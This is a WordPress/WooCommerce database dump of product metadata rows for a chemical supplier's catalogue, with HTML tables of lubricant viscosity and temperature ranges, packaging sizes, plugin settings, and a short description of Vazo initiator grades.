INSERT INTO `wp_postmeta` VALUES (3966, 581, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (3967, 581, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (3968, 581, '312_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="89">\r\n<p style="text-align: center;">Property</p>\r\n</td>\r\n<td style="text-align: center;" width="89">143AZ</td>\r\n<td style="text-align: center;" width="89">143AA</td>\r\n<td style="text-align: center;" width="89">143AY</td>\r\n<td style="text-align: center;" width="89">143AB</td>\r\n<td style="text-align: center;" width="89">143AC</td>\r\n<td style="text-align: center;" width="89">143AD</td>\r\n</tr>\r\n<tr>\r\n<td width="89">\r\n<p style="text-align: center;">Viscosity @0°C</p>\r\n</td>\r\n<td style="text-align: center;" width="89">228</td>\r\n<td style="text-align: center;" width="89">350</td>\r\n<td style="text-align: center;" width="89">620</td>\r\n<td style="text-align: center;" width="89">1070</td>\r\n<td style="text-align: center;" width="89">3940</td>\r\n<td width="89">\r\n<p style="text-align: center;">7500</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="89">\r\n<p style="text-align: center;">Viscosity @40°C</p>\r\n</td>\r\n<td style="text-align: center;" width="89">22.8</td>\r\n<td style="text-align: center;" width="89">32</td>\r\n<td style="text-align: center;" width="89">50</td>\r\n<td style="text-align: center;" width="89">78</td>\r\n<td style="text-align: center;" width="89">243</td>\r\n<td width="89">\r\n<p style="text-align: center;">450</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="89">\r\n<p style="text-align: center;">Viscosity @100°C</p>\r\n</td>\r\n<td style="text-align: center;" width="89">4.1</td>\r\n<td style="text-align: center;" width="89">5.3</td>\r\n<td style="text-align: center;" width="89">7.4</td>\r\n<td style="text-align: center;" width="89">10.2</td>\r\n<td style="text-align: center;" width="89">25.4</td>\r\n<td width="89">\r\n<p style="text-align: center;">42.4</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="89">\r\n<p style="text-align: center;">Temperature Range °C</p>\r\n</td>\r\n<td style="text-align: center;" width="89">-57-149</td>\r\n<td style="text-align: center;" width="89">-51-177</td>\r\n<td style="text-align: center;" width="89">-46-204</td>\r\n<td style="text-align: center;" width="89">-40-232</td>\r\n<td style="text-align: center;" width="89">-34-288</td>\r\n<td style="text-align: center;" width="89">-29-316</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (3969, 581, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">Syringe</p>\r\n</td>\r\n<td style="text-align: center;" width="125">Tube</td>\r\n<td style="text-align: center;" width="125">Jar</td>\r\n<td style="text-align: center;" width="125">Cartridge</td>\r\n<td style="text-align: center;" width="125">Pail</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td style="text-align: center;" width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (3970, 581, 'wc_productdata_options', 'a:1:{i:0;a:8:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";s:12:"_top_content";s:0:"";s:15:"_bottom_content";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (3971, 581, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3972, 581, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3973, 581, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (3974, 581, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3975, 581, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (3976, 581, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (3977, 581, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (3978, 581, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (3979, 581, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3980, 581, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3981, 581, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3982, 581, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (3983, 581, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (3984, 581, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3985, 581, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (3986, 581, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3987, 581, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3988, 581, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (3989, 581, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3990, 581, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3991, 581, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (3992, 581, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3993, 581, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3994, 581, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (3995, 581, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (3996, 581, '_ywtm_content_tab_description', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">Syringe</p>\r\n</td>\r\n<td style="text-align: center;" width="125">Tube</td>\r\n<td style="text-align: center;" width="125">Jar</td>\r\n<td style="text-align: center;" width="125">Cartridge</td>\r\n<td style="text-align: center;" width="125">Pail</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td style="text-align: center;" width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (3997, 581, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3998, 581, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3999, 581, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (4000, 581, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (4001, 581, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (4002, 581, '318_custom_list_file', 'a:1:{s:32:"70ccdffe290807f0793a91fbbfcfd7bc";a:3:{s:4:"name";s:20:"Aerospace Data Sheet";s:4:"file";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Aerospace-PDF.pdf";s:4:"desc";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (4026, 581, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (4027, 581, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (4028, 582, '_edit_lock', '1472052064:2'); 
INSERT INTO `wp_postmeta` VALUES (4029, 582, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (4031, 582, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (4032, 582, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (4033, 582, '312_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="89">\r\n<p style="text-align: center;">Property</p>\r\n</td>\r\n<td style="text-align: center;" width="89">143AZ</td>\r\n<td style="text-align: center;" width="89">143AA</td>\r\n<td style="text-align: center;" width="89">143AY</td>\r\n<td style="text-align: center;" width="89">143AB</td>\r\n<td style="text-align: center;" width="89">143AC</td>\r\n<td style="text-align: center;" width="89">143AD</td>\r\n</tr>\r\n<tr>\r\n<td width="89">\r\n<p style="text-align: center;">Viscosity @0°C</p>\r\n</td>\r\n<td style="text-align: center;" width="89">228</td>\r\n<td style="text-align: center;" width="89">350</td>\r\n<td style="text-align: center;" width="89">620</td>\r\n<td style="text-align: center;" width="89">1070</td>\r\n<td style="text-align: center;" width="89">3940</td>\r\n<td width="89">\r\n<p style="text-align: center;">7500</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="89">\r\n<p style="text-align: center;">Viscosity @40°C</p>\r\n</td>\r\n<td style="text-align: center;" width="89">22.8</td>\r\n<td style="text-align: center;" width="89">32</td>\r\n<td style="text-align: center;" width="89">50</td>\r\n<td style="text-align: center;" width="89">78</td>\r\n<td style="text-align: center;" width="89">243</td>\r\n<td width="89">\r\n<p style="text-align: center;">450</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="89">\r\n<p style="text-align: center;">Viscosity @100°C</p>\r\n</td>\r\n<td style="text-align: center;" width="89">4.1</td>\r\n<td style="text-align: center;" width="89">5.3</td>\r\n<td style="text-align: center;" width="89">7.4</td>\r\n<td style="text-align: center;" width="89">10.2</td>\r\n<td style="text-align: center;" width="89">25.4</td>\r\n<td width="89">\r\n<p style="text-align: center;">42.4</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="89">\r\n<p style="text-align: center;">Temperature Range °C</p>\r\n</td>\r\n<td style="text-align: center;" width="89">-57-149</td>\r\n<td style="text-align: center;" width="89">-51-177</td>\r\n<td style="text-align: center;" width="89">-46-204</td>\r\n<td style="text-align: center;" width="89">-40-232</td>\r\n<td style="text-align: center;" width="89">-34-288</td>\r\n<td style="text-align: center;" width="89">-29-316</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (4034, 582, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">Syringe</p>\r\n</td>\r\n<td style="text-align: center;" width="125">Tube</td>\r\n<td style="text-align: center;" width="125">Jar</td>\r\n<td style="text-align: center;" width="125">Cartridge</td>\r\n<td style="text-align: center;" width="125">Pail</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td style="text-align: center;" width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (4035, 582, 'wc_productdata_options', 'a:1:{i:0;a:8:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";s:12:"_top_content";s:0:"";s:15:"_bottom_content";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (4036, 582, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4037, 582, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4038, 582, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (4039, 582, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4040, 582, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (4041, 582, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (4042, 582, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (4043, 582, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (4044, 582, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4045, 582, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4046, 582, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4047, 582, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (4048, 582, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (4049, 582, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4050, 582, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (4051, 582, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4052, 582, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4053, 582, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (4054, 582, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4055, 582, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4056, 582, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (4057, 582, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4058, 582, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4059, 582, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (4060, 582, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (4061, 582, '_ywtm_content_tab_description', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">Syringe</p>\r\n</td>\r\n<td style="text-align: center;" width="125">Tube</td>\r\n<td style="text-align: center;" width="125">Jar</td>\r\n<td style="text-align: center;" width="125">Cartridge</td>\r\n<td style="text-align: center;" width="125">Pail</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td style="text-align: center;" width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (4062, 582, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4063, 582, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4064, 582, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (4065, 582, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (4066, 582, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (4067, 582, '318_custom_list_file', 'a:1:{s:32:"70ccdffe290807f0793a91fbbfcfd7bc";a:3:{s:4:"name";s:20:"Aerospace Data Sheet";s:4:"file";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Aerospace-PDF.pdf";s:4:"desc";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (4091, 582, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (4092, 582, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (4093, 583, '_edit_lock', '1472052138:2'); 
INSERT INTO `wp_postmeta` VALUES (4094, 583, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (4096, 583, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (4097, 583, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (4098, 583, '312_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="89">\r\n<p style="text-align: center;">Property</p>\r\n</td>\r\n<td style="text-align: center;" width="89">143AZ</td>\r\n<td style="text-align: center;" width="89">143AA</td>\r\n<td style="text-align: center;" width="89">143AY</td>\r\n<td style="text-align: center;" width="89">143AB</td>\r\n<td style="text-align: center;" width="89">143AC</td>\r\n<td style="text-align: center;" width="89">143AD</td>\r\n</tr>\r\n<tr>\r\n<td width="89">\r\n<p style="text-align: center;">Viscosity @0°C</p>\r\n</td>\r\n<td style="text-align: center;" width="89">228</td>\r\n<td style="text-align: center;" width="89">350</td>\r\n<td style="text-align: center;" width="89">620</td>\r\n<td style="text-align: center;" width="89">1070</td>\r\n<td style="text-align: center;" width="89">3940</td>\r\n<td width="89">\r\n<p style="text-align: center;">7500</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="89">\r\n<p style="text-align: center;">Viscosity @40°C</p>\r\n</td>\r\n<td style="text-align: center;" width="89">22.8</td>\r\n<td style="text-align: center;" width="89">32</td>\r\n<td style="text-align: center;" width="89">50</td>\r\n<td style="text-align: center;" width="89">78</td>\r\n<td style="text-align: center;" width="89">243</td>\r\n<td width="89">\r\n<p style="text-align: center;">450</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="89">\r\n<p style="text-align: center;">Viscosity @100°C</p>\r\n</td>\r\n<td style="text-align: center;" width="89">4.1</td>\r\n<td style="text-align: center;" width="89">5.3</td>\r\n<td style="text-align: center;" width="89">7.4</td>\r\n<td style="text-align: center;" width="89">10.2</td>\r\n<td style="text-align: center;" width="89">25.4</td>\r\n<td width="89">\r\n<p style="text-align: center;">42.4</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="89">\r\n<p style="text-align: center;">Temperature Range °C</p>\r\n</td>\r\n<td style="text-align: center;" width="89">-57-149</td>\r\n<td style="text-align: center;" width="89">-51-177</td>\r\n<td style="text-align: center;" width="89">-46-204</td>\r\n<td style="text-align: center;" width="89">-40-232</td>\r\n<td style="text-align: center;" width="89">-34-288</td>\r\n<td style="text-align: center;" width="89">-29-316</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (4099, 583, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">Syringe</p>\r\n</td>\r\n<td style="text-align: center;" width="125">Tube</td>\r\n<td style="text-align: center;" width="125">Jar</td>\r\n<td style="text-align: center;" width="125">Cartridge</td>\r\n<td style="text-align: center;" width="125">Pail</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td style="text-align: center;" width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (4100, 583, 'wc_productdata_options', 'a:1:{i:0;a:8:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";s:12:"_top_content";s:0:"";s:15:"_bottom_content";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (4101, 583, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4102, 583, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4103, 583, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (4104, 583, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4105, 583, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (4106, 583, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (4107, 583, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (4108, 583, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (4109, 583, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4110, 583, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4111, 583, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4112, 583, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (4113, 583, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (4114, 583, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4115, 583, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (4116, 583, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4117, 583, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4118, 583, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (4119, 583, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4120, 583, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4121, 583, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (4122, 583, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4123, 583, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4124, 583, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (4125, 583, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (4126, 583, '_ywtm_content_tab_description', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">Syringe</p>\r\n</td>\r\n<td style="text-align: center;" width="125">Tube</td>\r\n<td style="text-align: center;" width="125">Jar</td>\r\n<td style="text-align: center;" width="125">Cartridge</td>\r\n<td style="text-align: center;" width="125">Pail</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td style="text-align: center;" width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (4127, 583, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4128, 583, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4129, 583, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (4130, 583, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (4131, 583, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (4132, 583, '318_custom_list_file', 'a:1:{s:32:"70ccdffe290807f0793a91fbbfcfd7bc";a:3:{s:4:"name";s:20:"Aerospace Data Sheet";s:4:"file";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Aerospace-PDF.pdf";s:4:"desc";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (4156, 583, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (4157, 583, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (4158, 577, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (4159, 575, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (4160, 577, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (4161, 577, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (4162, 577, '312_default_editor', 'Miller-Stephenson offers four commercial grades: Vazo 52(G), 64(G), 67(G), and 88(G). The grade number is the Celsius temperature at which the half-life in solution is 10 hours. Vazo 88 has the following physical characteristics:\r\n<ul>\r\n 	<li>Vazo 88: log (t1/2) = 7660 (1/T) - 18.39</li>\r\n 	<li>Delivered in solid white "noodle" form</li>\r\n 	<li>Soluble in a wide variety of solvents (aromatic hydrocarbons and other functional organic compounds)</li>\r\n 	<li>Slightly soluble in aliphatic hydrocarbons</li>\r\n 	<li>Insoluble in water</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (4163, 577, '317_default_editor', '100g, 10 and 50 lbs fiber drum, 25kg Corrugated carton'); 
INSERT INTO `wp_postmeta` VALUES (4164, 577, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (4165, 577, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (4166, 577, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4167, 577, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4168, 577, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (4169, 577, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4170, 577, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (4171, 577, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (4172, 577, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (4173, 577, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (4174, 577, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (4175, 577, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4176, 577, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4177, 577, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4178, 577, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (4179, 577, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (4180, 577, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4181, 577, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (4182, 577, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4183, 577, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4184, 577, '_stock', ''); 
